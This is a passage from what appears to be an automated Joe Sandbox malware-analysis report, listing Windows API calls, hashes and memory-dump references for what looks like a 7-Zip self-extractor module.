                                                                • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 00412927
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                • Opcode ID: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
                                                                • Instruction ID: 8d352c1c46fd1df2ac59e7115e7018534418c9226e76046c12a2ea9475f01b4a
                                                                • Opcode Fuzzy Hash: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
                                                                • Instruction Fuzzy Hash: 3F21C3717142869BCF34FF658A904EB7395AF40314B14462FE482D3201C7B8ADE5CB5E
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,?,00405789,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 004035D4
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                • Opcode ID: ac816b6ef2abf4182fe3fab88150d6e7fb7849f17cb6b15ec7980f19aa18face
                                                                • Instruction ID: 1b5e1ee4d6878524e1e94f3eb7038bf21a854c21e9593a8af651c0b03c199f54
                                                                • Opcode Fuzzy Hash: ac816b6ef2abf4182fe3fab88150d6e7fb7849f17cb6b15ec7980f19aa18face
                                                                • Instruction Fuzzy Hash: FED0A9312082203AEA5862320C119AF08884F40329B008C3FB802E62D1DE3ECE81429E
                                                                APIs
                                                                • CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                                                • Instruction ID: 2edd4d7db1caf844859ff0a1764f07c4c63b16d89aef5b3dab10146b982c9a76
                                                                • Opcode Fuzzy Hash: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
                                                                • Instruction Fuzzy Hash: 4DD01231604161468E745E3C7A445D637D85A06370321079BF4B5C32E1D3B58CD35A98
                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004133A4,?,?,?,0040C03F,?), ref: 00402A4B
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                                                • Instruction ID: 5872fe86412dcdd468f52b7ecb5979782df8fbe157f8593837c634c381a8cb4c
                                                                • Opcode Fuzzy Hash: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
                                                                • Instruction Fuzzy Hash: 5FC08C703483007AEE211B748F0BB4B3653AF84B16F90C029F348B40E0CBF58410AA0A
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00004B38), ref: 00412245
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                • Opcode ID: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
                                                                • Instruction ID: 3495fa19a298e49cc2800c4131356790e1569378de7ddbf050defd7ea7821dd7
                                                                • Opcode Fuzzy Hash: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
                                                                • Instruction Fuzzy Hash: 40B012E474010671AE4420721F132EF20C007D1385F0408B7AA07E42C2FEDCCAE5912F
                                                                APIs
                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,00413333,00000000,?,0041339B,?,?,0040C03F,?), ref: 00402002
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                • Opcode ID: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                                                • Instruction ID: 703a6ff84afb8074b9885b8fa9c0ccab1db7962bc4b9572073b4c9a6fb1bc3a6
                                                                • Opcode Fuzzy Hash: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
                                                                • Instruction Fuzzy Hash: 8DB09230285700BAEF224B00DE0DB4A76A0BB80B06F24C428B288240E087B86818DA0E
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
                                                                • wsprintfW.USER32 ref: 004024DD
                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
                                                                • GetLastError.KERNEL32 ref: 004024F7
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
                                                                • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
                                                                • GetLastError.KERNEL32 ref: 0040252C
                                                                • lstrcmpiW.KERNEL32(0051A408,?), ref: 00402541
                                                                • ??3@YAXPAX@Z.MSVCRT(0051A408), ref: 00402551
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
                                                                • SetLastError.KERNEL32(00000003), ref: 00402578
                                                                • lstrlenA.KERNEL32(0041B328), ref: 004025AC
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
                                                                • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
                                                                • _wtol.MSVCRT ref: 0040260A
                                                                • MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,0051A408,00000002), ref: 0040262A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                • String ID: 7zSfxString%d
                                                                • API String ID: 2117570002-3906403175
                                                                • Opcode ID: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
                                                                • Instruction ID: 1954578a42ed511618fabe736ee1125ec7d3cad31fc3f85986fc13fa068848c6
                                                                • Opcode Fuzzy Hash: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
                                                                • Instruction Fuzzy Hash: 9951A379900214FFDB10DF75DD49ADABBA9FB08340F10443AE946E62D0E7B8A951CB1D
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                                                • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                                                • LockResource.KERNEL32(00000000), ref: 00402121
                                                                • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 0040214D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00402156
                                                                • wsprintfW.USER32 ref: 00402175
                                                                • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 0040218A
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040218D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                • API String ID: 2639302590-365843014
                                                                • Opcode ID: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                                                • Instruction ID: 092f3855134823e072dda954e94301c8fdf66ebe7b0f0e4b82829ee13f00460f
                                                                • Opcode Fuzzy Hash: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
                                                                • Instruction Fuzzy Hash: 7C21B0B5941308BBDB119BA59C08F9B3ABCEB44711F108422FA04E72D0D6B8CD108BA9
                                                                APIs
                                                                • wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                • GetLastError.KERNEL32 ref: 0040963B
                                                                • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                • lstrlenW.KERNEL32(?), ref: 0040968B
                                                                • lstrlenW.KERNEL32(?), ref: 00409692
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                • lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                • lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                • LocalFree.KERNEL32(?), ref: 004096E1
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                • String ID:
                                                                • API String ID: 829399097-0
                                                                • Opcode ID: e19ea4daa404c5e85e295f528f45600472c05eaa69f6bcc88292a866bb27d639
                                                                • Instruction ID: 0f5aa2174aa9d056a6dafd0f9c7aa592ac4ad2a583e4ab7749965f253d727b0f
                                                                • Opcode Fuzzy Hash: e19ea4daa404c5e85e295f528f45600472c05eaa69f6bcc88292a866bb27d639
                                                                • Instruction Fuzzy Hash: F0216176800108FFDB159FA1DC85DEB7BACEF08354B10847BF946A6191EA359E84CBA4
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,0041A68C,?,?,?,00000000), ref: 0040320B
                                                                • lstrcmpW.KERNEL32(?,0041A688,?,0000005C,?,?,?,00000000), ref: 0040325E
                                                                • lstrcmpW.KERNEL32(?,0041A680,?,?,00000000), ref: 00403274
                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 0040328A
                                                                • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00403291
                                                                • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 004032A3
                                                                • FindClose.KERNEL32(00000000,?,?,00000000), ref: 004032B2
                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 004032BD
                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 004032C6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032D1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004032DC
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                • String ID:
                                                                • API String ID: 1862581289-0
                                                                • Opcode ID: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                                                • Instruction ID: 78ea6f58b6c007c21ca8543ec41bf80dc5d167b0896979d67dadc0a8fcb0d376
                                                                • Opcode Fuzzy Hash: d0a5d61d4e970fa2e12ee4e43d613ab26048e5a8235c629d0d05804913e14dc8
                                                                • Instruction Fuzzy Hash: 86216131601208BADB11AF61EC59EFE3B7CAF44746F1444BAF405B21D1EB389B45CA69
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 00408DDA
                                                                • SetWindowsHookExW.USER32(00000007,Function_00008D01,00000000,00000000), ref: 00408DE5
                                                                • GetCurrentThreadId.KERNEL32 ref: 00408DF4
                                                                • SetWindowsHookExW.USER32(00000002,Function_00008D8D,00000000,00000000), ref: 00408DFF
                                                                • EndDialog.USER32(?,00000000), ref: 00408E25
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: CurrentHookThreadWindows$Dialog
                                                                • String ID:
                                                                • API String ID: 1967849563-0
                                                                • Opcode ID: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                                                • Instruction ID: b9e6956ff065cd05f2df324d2b5f6df6e8dcd0ec849c0deb45459710c318944d
                                                                • Opcode Fuzzy Hash: 64107a2dc15b1d7316d888ad8cd960e682b3da45f1fa61c15e116e140322c59e
                                                                • Instruction Fuzzy Hash: 51012671201218DFD2106F57ED44AB2F3ECEF54395B01843FE606D29A0CBB758008F69
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,004066A7,?,?,?,?,004066A7), ref: 0040277D
                                                                • CheckTokenMembership.ADVAPI32(00000000,004066A7,?,?,?,?,004066A7,00000000,?,?), ref: 0040278F
                                                                • FreeSid.ADVAPI32(004066A7,?,?,?,004066A7,00000000,?,?), ref: 00402798
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                • Opcode ID: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                                                • Instruction ID: 8fcaf4468ec200eb9195fd6454b881e9af9bec8ea6f7a7215fc0dea95779660d
                                                                • Opcode Fuzzy Hash: 65cc84debf9a599d2aa76ae24c15b7a3b387b9e5edbe49ca06617e6efb59e37b
                                                                • Instruction Fuzzy Hash: 44F03176945248FEDB01DFE88D85ADDBF7CAB18200F4480AAE105A3182D2705714CB29
                                                                APIs
                                                                • GetCommandLineW.KERNEL32(?,00000000,?), ref: 004054AA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040556D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00405575
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040557D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00405585
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040558D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 00405595
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 0040559D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004055A5
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004055AD
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055B5
                                                                • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004055CE
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004055F5
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004055FF
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040560A
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405612
                                                                • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00405627
                                                                • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 0040563E
                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040564E
                                                                • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 0040566F
                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405678
                                                                • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 00405697
                                                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A0
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 004056A7
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004056B6
                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 004056BF
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004056CA
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004056D6
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056DD
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004056E8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                • String ID: " -$sfxwaitall
                                                                • API String ID: 2734624574-3991362806
                                                                • Opcode ID: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                                                • Instruction ID: 96b1f86dbfc8e56d759c45ddf3715b356338dee30da8fd38d33b0e85c5ab07db
                                                                • Opcode Fuzzy Hash: c2e281962814c2bd4c040bf537fa2d9b9fa3379860e294df17422ee88ae54ba2
                                                                • Instruction Fuzzy Hash: F66151B2801108BBDF11AFA2DC45DDF3B7DFF48314F004536F915A21A1EB3A99549B69
                                                                APIs
                                                                • _wtol.MSVCRT ref: 00403B78
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,0041EA00,00000000,0041E9F4), ref: 00403C1B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403C8C
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403C94
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403C9C
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403CA4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403CAC
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403CB4
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403CBC
                                                                • _wtol.MSVCRT ref: 00403D12
                                                                • CoCreateInstance.OLE32(0041C454,00000000,00000001,0041C414,[@,.lnk,?,0000005C), ref: 00403DB3
                                                                • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403E4B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403E53
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403E5B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403E63
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403E6B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403E73
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403E7B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403E81
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403E89
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.4017543989.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000010.00000002.4017505413.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017587254.000000000041A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017609709.000000000041E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 00000010.00000002.4017658436.0000000000423000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_400000_X0JA3EDV7BU5B3IH21ST0OE852AR.jbxd
                                                                Similarity
                                                                • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                • String ID: .lnk$[@
                                                                • API String ID: 408529070-3575931549
                                                                • Opcode ID: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                                                • Instruction ID: 946a9f5c9c0093345211e4afafb7f9b8cfdd3f629f77b347e180bd11e348c725
                                                                • Opcode Fuzzy Hash: bf0e8a7df910328bb8376132718844ce6bb33e016dc20b09a56e47b2bf9c17d8
                                                                • Instruction Fuzzy Hash: 57A16E75810108ABCF15EFA1CC969EEBB7DFF19306F50442AF402B61A1EB399E41CB58
